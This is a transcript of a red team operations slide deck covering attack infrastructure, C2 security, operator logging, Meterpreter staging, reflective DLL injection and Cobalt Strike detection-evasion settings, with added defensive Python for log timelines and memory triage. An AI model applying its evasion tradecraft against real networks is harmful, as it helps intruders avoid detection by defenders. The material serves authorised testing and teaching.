Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 

Introduction to red team operations

  • 1. Introduction to Red Team Operations Sunny Neo (@sunn_y_k) sunny@live.com.sg
  • 2. #whoami •Perpetual Information Security Student •Penetration Tester @ Centurion Information Security •It was really hard to get here - On and Off Fever Last Night
  • 3. Disclaimer •All views are mine and not the company I work for or any organisation that I am affiliated with. •I take NULL credit for all the materials presented here •I am here just to share the good work from awesome people and have fun
  • 4. Shout Out Raphael Mudge (@armitagehacker) •Awesome resource on Red Team Operations •Advanced Threat Tactics (2015) https://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/ https://www.youtube.com/watch?v=4w7krkqxRck&list=PL9HO6M_MU2nf8Fa5bVefBW-9bg5Rx94_c •https://blog.cobaltstrike.com/
  • 5. Shout Out - Jeff Dimmock (@bluscreenofjeff) •Awesome materials on Red Team Infrastructure •https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/ •https://speakerdeck.com/bluscreenofjeff/building-a-better-moat-designing-an-effective-covert-red-team-attack-infrastructure •https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
  • 6. Shout Out •Anyone who shared their experience with me or answer my stupid questions over Twitter / Slack (BloodHoundGang) / Beer(s)
  • 7. Objective •Share my journey on learning about Red Team Operations •Bridge the gap between Penetration Testers and Red Teamers
  • 8. Penetration Testing •Scope Provided • Limited to No Reconnaissance Required •No Stealth required • Scan everything in Scope • Run tools out of the box (Did you rebuild the tool?) •Simple to No Infrastructure setup
  • 9. Red Team Operation • Test your security investment in a realistic way – objective based • Depend on the type of operations • Full Scope Testing (Physical, Social and Cyber) • Long-Term Operation • Threat Emulation (Emulating a real-world actor) Source: https://blog.cobaltstrike.com/2015/07/09/models-for-red-team-operations/ https://blog.cobaltstrike.com/2016/02/17/the-threat-emulation-problem/
  • 10. Red Team Operation •Generally • Limited Information Provided • Require Stealth • Require Appropriate Infrastructure Setup for the operation
  • 12. Mindset •Boxed-in by Scope •Emphasis on Coverage of Systems and Vulnerabilities in Scope •Does not look for the easiest path to the objective
  • 13. Habits •Guided by Mindset •Scan everything in Scope due to the emphasis on coverage •Does not apply the adversary’s tradecraft, but whatever gets the job done
  • 14. Scale •No clearly defined scope - How to start? •Excessive Information - How do you manage information gathered along the way due to the vague scope?
  • 15. Principles for Red Team Operations (Mine) •Protect your Infrastructure •Log Everything! •Less is More •Don’t Get Caught
  • 16. Protect Your Infrastructure •Why the need for Infrastructure? •Why the need to protect your infrastructure?
  • 17. Protect Your Infrastructure •Why the need for Infrastructure? •Why the need to protect your infrastructure?
  • 18. Typical Penetration Test Infrastructure Source: https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/
  • 19. Services Required for Red Team Operations •SMTP Server – Phishing •Web and Database Servers – Phishing and Storing Stolen Credentials •Payload/Staging Servers – Storing and Sending Payloads •Multiple Teamservers – C2
  • 20. Shell Management •Never do anything from just one shell and one team server •Always try to persist and expand more shell accesses •Red team infrastructure design is critical for covert operations • Short Haul Servers – Initial Access + Post Exploitation Activities • Long Haul Servers – Low and Slow Callbacks + Session Passing •https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing-red-team-operations/
  • 21. Redirector and Filtering Source: https://bluescreenofjeff.com/2017-12-05-designing-effective-covert-red-team-attack-infrastructure/
  • 23. Apache Redirector - .htaccess Source: https://bluescreenofjeff.com/2016-04-12-combatting-incident-responders-with-apache-mod_rewrite/
  • 24. .htaccess Blacklisting •Jason Lang (@curi0usJack) •.htaccess to redirect • known AV companies IP address ranges • TOR Exit Nodes •https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10
  • 25. Automate Your Infrastructure • Painful to rebuild everything for each engagement • Automate Infrastructure setup with CoalFire’s Red Baron TerraForm Examples • https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-1/ • https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-2/ • https://github.com/Coalfire-Research/Red-Baron
  • 28. Command and Control (C2) Security • Protect your customer’s systems and data • You don’t want your agents/beacons to be hijacked or confidential data leaked • Evaluate the C2 security based on • Encryption • Authentication • Anti Replay Attacks • https://medium.com/@malcomvetter/responsible-red-teams-1c6209fd43cc
  • 29. Staged Beacon Process (diagram) • TeamServer to Victim: Staged Payload, carrying the TeamServer Public Key • Victim to TeamServer: Initial Callback with Meta Data and Session Key, Encrypted with the TeamServer Public Key
  • 30. Staged Beacon Process (diagram, continued) • TeamServer to Victim: Tasks, Encrypted with Session Key • Victim to TeamServer: Task Output, Encrypted with Session Key Source: Raphael Mudge - Advanced Threat Tactics (2 of 9): Infrastructure https://www.youtube.com/watch?v=3gBJOJb8Oi0&feature=youtu.be&t=49m55s
  • 31. Log Everything! • Important to have timestamped logs for • Timeline of Events • Clean up • Investigation if anything goes down • Empire and Cobalt Strike are fine… • cmd.exe? • PowerShell? • bash? • Metasploit? • RDP?
  • 32. Log Everything! (Tool – Command)
    • Command Prompt: prompt $D$S$T$S$P$G
    • PowerShell (PowerShell Profile/GPO): Start-Transcript -Path C:\pslogging\transcript.txt -NoClobber -IncludeInvocationHeader OR Computer Configuration – Administrative Templates – Windows Components – Windows PowerShell – “Turn on PowerShell Transcription”
    • Bash (~/.bashrc): #Enable Timestamp for Command Line and Use Screen to log session: PS1='\D{%F %T} [\u@\h \W] \$ ' ; screen -L -Logfile engagementXX.log bash ; #Expand History Limits, Enable TimeStamp and Append commands to History for multiple terminals: export HISTSIZE= ; export HISTFILESIZE= ; export HISTTIMEFORMAT="%d/%m/%y %T " ; export HISTCONTROL=ignoredups:erasedups ; shopt -s histappend ; export PROMPT_COMMAND="history -a; history -c; history -r; $PROMPT_COMMAND"
    • Msfconsole (~/.msf4/msfconsole.rc): set ConsoleLogging true ; set LogLevel 5 ; set SessionLogging true ; set TimestampOutput true ; set PromptTimeFormat %Y/%m/%d %H:%M:%S
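Timestamped logs are only useful for the timeline, clean-up and investigation the previous slide mentions if they can be merged across tools. As an added example (not part of the deck), a small Python script that combines the records the settings above produce: the screen log of the bash prompt with \D{%F %T}, a msfconsole log with PromptTimeFormat %Y/%m/%d %H:%M:%S, and a PowerShell transcript written with -IncludeInvocationHeader. All log lines are constructed, and the "[timestamp] msf > command" line layout is an assumption.

```python
import re
from datetime import datetime
from typing import List, Tuple

Event = Tuple[datetime, str, str]  # (timestamp, source tool, command)
# Constructed sample: screen -L output for the prompt PS1='\D{%F %T} [\u@\h \W] \$ '
BASH_SCREEN_LOG = """\
2018-05-12 10:15:01 [op@kali ~] $ whoami
2018-05-12 10:15:09 [op@kali ~] $ ls -la /tmp
"""
# Constructed sample; the "[timestamp] msf > command" layout is an assumption.
MSF_CONSOLE_LOG = """\
[2018/05/12 10:15:05] msf > version
[2018/05/12 10:15:30] msf > sessions -l
"""
# Constructed sample: -IncludeInvocationHeader writes "Command start time:
# yyyyMMddHHmmss" before every command; the session "Start time" is skipped.
PS_TRANSCRIPT = """\
**********************
Windows PowerShell transcript start
Start time: 20180512101500
**********************
**********************
Command start time: 20180512101520
**********************
PS C:\\Users\\op> Get-Date
**********************
Command start time: 20180512101545
**********************
PS C:\\Users\\op> hostname
"""

BASH_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \[[^\]]+\] \$ (.+)$")
MSF_RE = re.compile(r"^\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2})\] msf[^>]*> (.+)$")
PS_TIME_RE = re.compile(r"^Command start time: (\d{14})$")
PS_CMD_RE = re.compile(r"^PS [^>]+> (.+)$")

def _scan(text: str, regex, fmt: str, tool: str) -> List[Event]:
    # One-line-per-command logs: timestamp and command sit on the same line.
    events = []
    for line in text.splitlines():
        m = regex.match(line)
        if m:
            events.append((datetime.strptime(m.group(1), fmt), tool, m.group(2)))
    return events

def parse_bash(text: str) -> List[Event]:
    return _scan(text, BASH_RE, "%Y-%m-%d %H:%M:%S", "bash")

def parse_msf(text: str) -> List[Event]:
    return _scan(text, MSF_RE, "%Y/%m/%d %H:%M:%S", "msfconsole")

def parse_ps_transcript(text: str) -> List[Event]:
    # Pair each "Command start time" header with the prompt line that follows it.
    events, pending = [], None
    for line in text.splitlines():
        m = PS_TIME_RE.match(line)
        if m:
            pending = datetime.strptime(m.group(1), "%Y%m%d%H%M%S")
            continue
        m = PS_CMD_RE.match(line)
        if m and pending is not None:
            events.append((pending, "powershell", m.group(1)))
            pending = None
    return events

def build_timeline(*sources: List[Event]) -> List[Event]:
    # Merge every tool's events into one chronologically sorted list.
    return sorted((e for src in sources for e in src), key=lambda e: e[0])
```

Timestamps from the three tools are in the local clock of the machine that wrote them, so align clocks (or record the offset) across the operator hosts before trusting the merged order.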
  • 33. Less Is More: Information Management •Don’t just collect information mindlessly •Use as many scripts as possible to perform data mining •Have processes/tools to categorise the information/logs collected so that they can be looked up easily •http://www.harmj0y.net/blog/redteaming/push-it-push-it-real-good/ •https://vincentyiu.co.uk/cobaltsplunk/
  • 35. Target • Knowing your target • Knowing what kind of controls they have • Controls • Email Filtering Gateway • Egress Filtering and Authenticated Proxy with Domain Categorization • IDS/IPS (This Gen, Next Gen, Future Gen) • Sandbox • Antivirus (This Gen, Next Gen, Future Gen) • Endpoint Detection & Response • Security Operations Center with analysts looking at alerts
  • 36. Tactics, Techniques and Procedures (TTPs) •What is the mode of operation? • Smash and Grab • Diversion • Long-Term Operation
  • 37. Tactics, Techniques and Procedures (TTPs) •Tradecraft – Bad Guy’s Best Practices •Learn from the Bad Guys • Threat Intelligence Reports • https://github.com/kbandla/APTnotes • https://github.com/aptnotes/data • MITRE ATT&CK Framework • https://attack.mitre.org/wiki/Main_Page • https://github.com/redcanaryco/atomic-red-team
  • 38. Toolset •Are your tools suitable for the operation? •Are you able to make operation trade-offs based on your knowledge of your tools? • What is the workflow of the tool? • What artifacts are created?
  • 39. Metasploit & Meterpreter •Web Delivery Module with windows/meterpreter/reverse_tcp
  • 40. Web Delivery Module Process 1. Run the PowerShell One-Liner to download and execute the PowerShell Stager 2. The Stager fetches the (encoded) Stage (DLL) and passes control to the Stage 3. The Stage performs (decoding) and Reflective DLL Injection to run the actual payload
  • 41. PowerShell Stager on Wire • Run the PowerShell One-liner to download and execute PowerShell Stager
  • 42. Stage on Wire •The Stager fetches the (encoded) Stage (DLL) and passes control to the Stage
  • 43. EnableStageEncoding Option •Web Delivery Module with windows/meterpreter/reverse_tcp •EnableStageEncoding => true
  • 46. (Reflective) DLL Injection Overview (diagram, Process A injecting into Process B) • Step 1 – Process A attaches to Process B • Step 2 – Allocate Memory (New Memory Section) in Process B and Write DLL Path or Write DLL Content into it • Step 3 – Execute - LoadLibrary / Reflective Loader • Step 4 – New Thread in Process B runs the DLL *For DLL Injection, the DLL file has to be written to disk Source: http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html
  • 47. Staged Meterpreter Memory Artifact Payload: windows/meterpreter/reverse_http
  • 48. Staged Meterpreter Memory Artifact Decoded Stage
  • 49. Staged Meterpreter Memory Artifact Actual Payload (metsrv.dll) Running
  • 50. Metasploit Paranoid Mode •(Generally) Metasploit should not be used for Red Teaming because most of its payloads can be hijacked and many signatures have been created for them •Use Paranoid Mode if you need to - Payload UUID Whitelisting and SSL Certificate Pinning to prevent hijacking •Use “reverse_winhttps” instead of “reverse_https” to enable SSL Certificate Pinning for the Stager
  • 51. Cobalt Strike •Adversary Simulation Tool •Features • Team Operation • Client Side Exploitation • Asynchronous Post Exploitation • Covert Communication Flexibility
  • 52. Cobalt Strike - Default Staged Beacon
  • 53. Cobalt Strike - Default Stage Memory
  • 54. Cobalt Strike - Default Beacon Memory
  • 55. Cobalt Strike - Default String in Stage and Beacon
  • 56. Memory Detection Heuristics • Thread or memory not mapped to a file • Static Image Size • RWX Page Memory Permission • Known Strings and PE headers • William Burgess & Matt Watkins - Advanced Attack Detection https://www.youtube.com/watch?v=ihElrBBJQo8 • Raphael Mudge – In-memory Evasion (1 of 4) - Detections https://www.youtube.com/watch?v=lz2ARbZ_5tE
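As an added example (not from the deck, and not the logic of any tool it names), a Python triage routine that applies the four heuristics above to per-region memory records of the kind a memory scanner reports. The region records, the known image size and the known-string list are constructed placeholders that a hunt team would replace with its own baselines.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

@dataclass
class MemoryRegion:
    # Simplified per-region record; a real scanner reports many more attributes.
    pid: int
    base: int
    size: int
    protection: str              # "RWX", "RX", "RW", ...
    mapped_file: Optional[str]   # backing file on disk; None for private memory
    thread_start_inside: bool    # some thread's start address falls in this region
    head: bytes                  # first bytes of the region
    strings: Set[str] = field(default_factory=set)

# Hypothetical baselines (assumptions, not values from the deck): a catalogued
# implant image size and a string the hunt team has seen in unpacked loaders.
KNOWN_IMAGE_SIZES = {0x41000}
KNOWN_STRINGS = {"ReflectiveLoader"}

def score_region(r: MemoryRegion) -> List[str]:
    """Return the list of heuristics from the slide that this region trips."""
    findings = []
    if r.mapped_file is None and r.thread_start_inside:
        findings.append("thread running from memory not mapped to a file")
    if r.size in KNOWN_IMAGE_SIZES:
        findings.append("region size matches a known static image size")
    if r.protection == "RWX":
        findings.append("RWX page permission")
    if r.mapped_file is None and r.head[:2] == b"MZ":
        findings.append("PE header (MZ) in unbacked memory")
    hits = KNOWN_STRINGS & r.strings
    if hits:
        findings.append("known strings: " + ", ".join(sorted(hits)))
    return findings

def triage(regions: List[MemoryRegion], min_findings: int = 2) -> Dict[str, List[str]]:
    """Keep regions tripping at least min_findings heuristics, keyed by pid:base.
    Requiring more than one hit keeps a lone RWX JIT page from paging an analyst."""
    result = {}
    for r in regions:
        findings = score_region(r)
        if len(findings) >= min_findings:
            result[f"{r.pid}:{r.base:#x}"] = findings
    return result

# Constructed sample: an image-backed system DLL, a private data region and
# one region that looks like an injected, unobfuscated reflective DLL.
SAMPLE_REGIONS = [
    MemoryRegion(1234, 0x7FF812340000, 0x1F5000, "RX", r"C:\Windows\System32\ntdll.dll",
                 True, b"MZ\x90\x00", {"RtlAllocateHeap"}),
    MemoryRegion(1234, 0x1A2B0000, 0x10000, "RW", None, False, b"\x00\x00\x00\x00", set()),
    MemoryRegion(5678, 0x2C000000, 0x41000, "RWX", None, True, b"MZ\x90\x00",
                 {"ReflectiveLoader", "kernel32.dll"}),
]
```

A region whose PE header and strings have been masked (as the Malleable PE options on the following slides do) still trips the unbacked-thread and RWX checks, which is why the heuristics are scored together rather than relied on singly.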
  • 57. Cobalt Strike – Malleable PE •https://www.cobaltstrike.com/help-malleable-c2#memory
  • 58. Cobalt Strike – Malleable PE • obfuscate: “true” – >=3.11 • Reflective Loader does not initialise any unnecessary PE headers in allocated memory section for Beacon • Mask DLL Import Tables • Obfuscate any known strings for Beacon • cleanup: “true” • Free the memory of the Stage • module_x86 / module_x64 • Module Stomping • LoadLibrary a DLL that is not loaded and copy Beacon DLL into its memory space
  • 59. Cobalt Strike – Malleable PE Demo
  • 60. Cobalt Strike – Malleable PE •Additional Modification Options • prepend – Prepend strings before the DLL headers • strrep – replace string found •Could be used for Threat Emulation • peclone known malware binaries • Configure based on known YARA rule strings for malwares
  • 61. Cobalt Strike – Best Practices •Things you could do to make your Beacon harder to detect • Use a Malleable Profile and PE • Do Session Prepping • Use “spawnto” to change the default process for Post Exploitation Activities • Use In-memory .NET Assembly Execution for Post Exploitation activities • Avoid using a Stager • Avoid using PowerShell • Avoid Remote Process Injection
  • 62. Cobalt Strike – Best Practices •Recommended to Read/Watch • https://blog.cobaltstrike.com/2018/04/23/fighting-the-toolset • https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/ • https://blog.cobaltstrike.com/2017/10/25/modern-defenses-and-you/ • https://blog.cobaltstrike.com/2017/06/23/opsec-considerations-for-beacon-commands/
  • 63. Other approaches to Detect Beacon Source: https://twitter.com/jackcr/status/992390807268352001
  • 66. Other Reference • https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac • https://www.netscylla.com/whitepapers/Crestcon18_Common_Pitfalls_in_Redteaming.pdf • https://blog.cobaltstrike.com/2013/06/28/staged-payloads-what-pen-testers-should-know/ • https://www.slideshare.net/44Con/44con-meterpreter-internalsv2 • http://buffered.io/posts/staged-vs-stageless-handlers/ • https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/ • https://www.blackhat.com/docs/us-16/materials/us-16-Nipravsky-Certificate-Bypass-Hiding-And-Executing-Malware-From-A-Digitally-Signed-Executable-wp.pdf • https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process • https://www.slideshare.net/JoeDesimone4/taking-hunting-to-the-next-level-hunting-in-memory • https://ketansingh.net/make-executable-harder-to-recover-from-memory/ • https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Int0X80-Anti-Forensics-AF.pdf • https://www.veil-framework.com/least-privilege-removing-unnecessary-memory-permissions/ • Michael Hale Ligh, Andrew Case, Jamie Levy, Aaron Walters (2014) - The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux and Mac Memory